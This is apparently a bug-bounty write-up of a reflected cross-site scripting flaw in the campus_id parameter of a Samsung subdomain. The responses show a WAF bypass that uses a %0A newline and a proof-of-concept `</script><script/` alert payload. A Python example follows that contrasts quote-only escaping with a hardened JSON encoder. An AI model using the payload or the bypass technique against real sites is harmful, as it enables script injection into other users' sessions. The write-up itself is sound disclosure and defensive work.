Like what I did before, I searched for subdomains with sublist3r and checked the HTTP code on the subdomains I found.
I use Google Dorks too, to find some interesting URLs.
Until I tried this Google Dork:
- site:sgsg.samsung.com
When I used the Google Dork above, I found this URL:
the source code shows every value of the campus_id parameter.
Request:
Response:
```html
<script type="text/javascript">
//<![CDATA[
var timer;
var campus_id = "Oxford";
...
```
I tried a simple injection.
Request:
Response:
```html
<script type="text/javascript">
//<![CDATA[
var timer;
var campus_id = "Oxford\"";
...
```
We can't use quotes.
I tried a JavaScript tag.
Request:
Response:
```html
<script type="text/javascript">
//<![CDATA[
var timer;
var campus_id = "</script>";
...
```
Bam!! The server does not block my request.
Next steps.
Request:
Response:
[blocked]
I tried other HTML tags to make XSS, and the server blocked every one of my requests too.
Then I thought we could use the script tags.
Request:
Response:
[blocked]
Again? hmmm..
I think the server blocks the request when it detects a script tag or something else.
Time to bypass it.
# Bypass 1
Request:
Response:
[blocked]
# Bypass 2
Request:
Response:
[blocked]
# Bypass 3
Request:
Response:
[blocked]
# Bypass 4
Request:
Response:
[blocked]
# Bypass 5
Request:
Response:
```html
<script type="text/javascript">
//<![CDATA[
var timer;
var campus_id = "</script><script/
<k>alert`1`//";
...
```
**Success**
With %0A, the URL encoding of a newline, we can bypass the WAF on Samsung.
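The root cause visible in the responses above is output encoding, not the WAF: the server backslash-escapes a double quote but reflects `</script>` and a newline untouched, and the HTML tokenizer ends the script element at the first `</script` it sees regardless of the JavaScript string the value sits in. The following Python is an added example, not the site's code or the author's: it models that quote-only escaping beside a JSON-based encoder that also neutralises `<`, `>` and line terminators, and replays the reflected values from this write-up (the sample inputs are constructed from them) to check which variant the HTML parser can break out of.

```python
import json
import re

# Constructed sample inputs, taken from the values this write-up shows being
# reflected into `var campus_id = "...";` (the last one contains the %0A newline).
SAMPLES = [
    'Oxford',
    'Oxford"',
    '</script>',
    '</script><script/\n<k>alert`1`//',
]


def reflect_quote_only(value: str) -> str:
    """Model of the behaviour observed on the page: only backslash and the
    double quote are escaped, so the JS string literal stays intact but
    `</script>` and raw newlines are reflected verbatim."""
    escaped = value.replace('\\', '\\\\').replace('"', '\\"')
    return 'var campus_id = "' + escaped + '";'


def js_string_literal(value: str) -> str:
    """Hardened encoder (hypothetical, not the site's): JSON-encode the value,
    then additionally \\u-escape the characters the HTML parser cares about.
    json.dumps already escapes quotes, backslashes, control characters such as
    \\n and \\r, and (with the default ensure_ascii=True) U+2028/U+2029, so the
    literal is valid JavaScript and decodes back to the original value."""
    encoded = json.dumps(value)
    return (encoded
            .replace('<', '\\u003c')
            .replace('>', '\\u003e')
            .replace('&', '\\u0026'))


def reflect_hardened(value: str) -> str:
    """Same script line as the page, emitted through the hardened encoder."""
    return 'var campus_id = ' + js_string_literal(value) + ';'


def breaks_script_block(script_text: str) -> bool:
    """Check that mirrors the HTML tokenizer's rule: a literal `</script`
    (case-insensitive) anywhere in script text terminates the element, no
    matter what JavaScript construct surrounds it."""
    return re.search(r'</script', script_text, re.IGNORECASE) is not None


def has_raw_line_terminator(script_text: str) -> bool:
    """A raw newline inside a JS string literal is a syntax error at best and,
    combined with an early `</script`, a second tag on its own line at worst."""
    return any(ch in script_text for ch in '\n\r\u2028\u2029')


def round_trips(value: str) -> bool:
    """The hardened literal must still decode to exactly the original value,
    otherwise the fix silently corrupts legitimate campus names."""
    return json.loads(js_string_literal(value)) == value


if __name__ == '__main__':
    for sample in SAMPLES:
        weak = reflect_quote_only(sample)
        strong = reflect_hardened(sample)
        print(repr(sample))
        print('  quote-only :', weak.replace('\n', '\\n'),
              '| breaks script:', breaks_script_block(weak))
        print('  hardened   :', strong,
              '| breaks script:', breaks_script_block(strong),
              '| round-trips:', round_trips(sample))
```

`reflect_quote_only` reproduces the page's responses exactly (the `Oxford"` sample yields `var campus_id = "Oxford\"";`), and both the bare `</script>` value and the newline-split payload pass its check while failing `breaks_script_block`; the hardened form of the same inputs contains neither `</script` nor a raw newline, and `round_trips` confirms the browser still receives the original string. The same principle applies to any templating engine: emit values into a script block with a JSON-style encoder that escapes `<`, `>` and `&`, and let the WAF be a second layer rather than the only one.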
Screenshot:
#HappyHacking